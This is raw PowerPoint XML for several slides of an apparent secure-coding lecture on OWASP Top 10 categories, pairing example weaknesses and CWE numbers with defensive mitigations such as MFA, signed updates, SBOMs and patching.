          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Do not accept unsigned updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Do integrity checks on untrusted user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A596B2-0533-DC76-4CD1-0DA19FFE7D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="4279683"/>
            <a:ext cx="3200400" cy="1754326"/>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Digitally sign software updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify dependencies using checksums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure CI/CD pipelines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2903685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AC4A0EA-F578-6B81-E22F-959C07CF553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80D4AD4-8F86-EA4A-F6FF-841D6BA6F60F}"/>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4AD25F7B-48B5-CA1D-3CED-2E32D03C288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D9B07E8C-3A72-4BDD-D2AD-A53444B3E354}"/>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9B9D1BF8-FA33-3F24-FE03-D4F4838F69F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A7C7C7-7AAB-696A-C188-E9B676C48D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E177667-CE9F-6CFA-AE30-FDB134D42427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8693405" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>7. Identification and Authentication Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099A7587-FF45-F0F2-CA43-51268FD7D67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1143000"/>
            <a:ext cx="7239000" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Lack of confirmation of user’s identify, user authentication, and session management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{176E83D2-DABE-EDAC-CD1F-A5B496DE33BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3144214"/>
            <a:ext cx="6781800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Organization has weak password requirements, making brute-force/dictionary attacks easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No multi-factor authentication, which increases likelihood of unauthorized access or account compromises</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{547FB67B-0530-193A-CACB-C007C08F01DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2619321"/>
            <a:ext cx="2595582" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples of Weakness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D97E007-7EDB-5649-DF52-435547808A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="59619"/>
            <a:ext cx="348996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CWEs: 255, 259, 287, 288, 290, 294, 295, 297, 300, 302, 304, 306, 307, 346, 384, 521, 613, 620, 640, 798, 940, 1216</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68595A10-0308-8A22-4311-53047DAAD347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8202930" y="3923686"/>
            <a:ext cx="3200400" cy="2585323"/>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Always utilize MFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never deploy with default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure registration and credential recovery methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strong password policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2" descr="98.1 CHFI - Weak password? Remember this meme.... | Facebook">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DBBDC9E-0FA3-1ABD-4B11-97EF0E8E5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1096834"/>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27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ECBFFA1-7D68-DCDF-E8B5-7C89E78BEF9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0315D33E-2A72-207D-B16C-8FE6A2C53AF2}"/>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4F1DEA53-965B-BC53-8029-0217B7DFC22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39EDE3C9-F67A-ECD1-E3FA-4F76172CF8D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0A7B1DE0-DB37-5FF8-3252-C08E367CA832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EF93C3-5B99-4126-715D-C91F6715C9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C2AD6C-288E-3DE2-1631-050E48009B4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8355172" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>6. Vulnerable and Outdated Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6807A920-D898-F412-46EA-FCBDA6D84F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824786" y="1066800"/>
            <a:ext cx="6705600" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The use of outdated libraries, frameworks, or dependencies with known vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5D9D14-0566-6BA7-99C9-FE4565B9C623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824786" y="2819400"/>
            <a:ext cx="4259499" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Using version 2.14.1 of Log4J</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19F96A5-57AA-3503-6761-FED6245FFD23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9098280" y="4343400"/>
            <a:ext cx="3200400" cy="1754326"/>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Generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SBOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove unused dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patch Software </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Flex Tape Meme Generator - Imgflip">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A43C7E-96DC-89CD-9423-3F934F477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1114425"/>
            <a:ext cx="2496816" cy="28003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2DAA2E1-54AB-8E29-7E7A-0A7D984D2A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="152400"/>
            <a:ext cx="3124200" cy="3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CWEs: 937, 1035, 1104</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866764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2C2A0D7-3437-43B5-4202-F1312823907F}"/>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49029E7F-B773-4057-2FAB-0DD5B272469F}"/>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FA126094-E176-78B6-80EC-CC9054109839}"/>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87E5A800-AE8C-D655-F0F9-B59B095FE83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DCB701AF-6C8E-D00D-D8EE-F89CD762FA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98AD174B-5171-6EF8-98BD-78EA499412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AD006-CAA9-418E-E0AD-82B69478669A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5670142" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>5. Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575ACDEA-BB5C-CD1C-A15A-B1EE7D579CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="6248400" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improperly configured permissions on cloud services. Unnecessary features or services that create a vulnerabilities. Misconfigured error handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF73CD9-4730-2CCE-5616-7E2FD09730CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="59619"/>
            <a:ext cx="348996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CWEs: 2, 11, 13, 15, 16, 260, 315, 520, 526, 537, 541, 547, 611, 614, 756, 776, 942, 1004, 1032, 1174</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Colin on X: &quot;Just randomly thought of the scene in Spongebob where they're  steering the Flying Dutchman's ship and Spongebob is like “you're good  you're good you're good” as it gets destroyed">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37CD6CFB-CC9A-791F-EBFF-549CD6A04C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1201" y="1219200"/>
            <a:ext cx="3158384"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curity Vulnerability Testing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD91C28B-A372-6EE5-0112-D94DF885C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971800"/>
            <a:ext cx="3495675" cy="3248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59ABA5-5171-8ED0-82FC-55FC3CEB8BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="3733800"/>
            <a:ext cx="2600325" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Little pieces of information that are leaked in an error message may give an attacker more ammunition for later attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90538395-7FEB-09EE-C518-CB94B271C248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8498348" y="3986403"/>
            <a:ext cx="3200400" cy="2585323"/>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Minimize error messages in production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated Verification of system configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow secure configuration recommendations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30385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69264D1-CB9C-0181-7117-C18E26CDA015}"/>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A90140D-D843-8357-3B6D-C30DB880D8EE}"/>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8D48459D-66D4-AA88-F694-9F4FBFBBB7EB}"/>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8ED02142-1D8B-A2C7-BCF0-22B98F1251C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1FD21F68-C6ED-BE15-A144-8A7C342B7C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5987103-16C0-0A22-A069-5BBC6AF78B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F7C44A-FA16-B696-8A79-0A6EA18E8AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3804247" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>4. Insecure Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C69DDF-1734-C65C-D463-4BAE4CCA8363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1371600"/>
            <a:ext cx="5181600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security flaw due to weak architectural or design design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C31E6F6F-85B4-442F-AE0D-8A94C5466D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2209800"/>
            <a:ext cx="6461616" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure designs can still have implementation defects. An insecure design cannot be fixed by a perfect implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
